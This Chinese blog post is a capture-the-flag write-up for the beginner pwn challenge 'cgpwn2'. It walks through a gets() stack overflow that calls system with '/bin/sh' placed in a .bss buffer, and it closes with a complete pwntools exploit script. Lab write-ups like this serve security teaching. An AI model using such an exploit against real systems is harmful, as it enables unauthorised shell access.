攻防世界pwn新手练习（cgpwn2）

题目链接

分析

我们来看这道题，首先checksec并运行一下

可以看到是32位程序，有两个输入点，保护只有 NX。

接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西

这就是程序给我们的两个输入点，可以看到第二个是 gets ，那就很方便了，直接溢出利用就行，翻看其他函数我们可以发现有一个system函数

很遗憾的是只有system函数而没有我们需要的shellcode

看来只能我们自己往程序里面写了，可以发现的是第一个输入点哪儿有一个name，点击跟进

.bss 段的一个地址，我们知道NX开启的时候，.BSS也不一定就是不能执行的，我们可以先试试看，在第一个输入点输入 “/bin/sh”，第二个输入点溢出利用

结束了，它是可以成功利用的，over

构造payload的时候注意这是32位程序，而32位程序调用函数时栈的结构为：调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1

exp

from pwn import *
context.log_level = 'info'

#r = remote('', )
r = process('./cgpwn2')
elf = ELF('./cgpwn2')

r.recvuntil("please tell me your name")
r.sendline("/bin/sh")

payload = 'a'*0x26 + 'a'*4 + p32(elf.sym['system']) + 'aaaa' + p32(0x0804A080) #最后这个是name地址，ida中复制即可
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)

r.interactive()

博客（buryia.top），欢迎师傅们来踩踩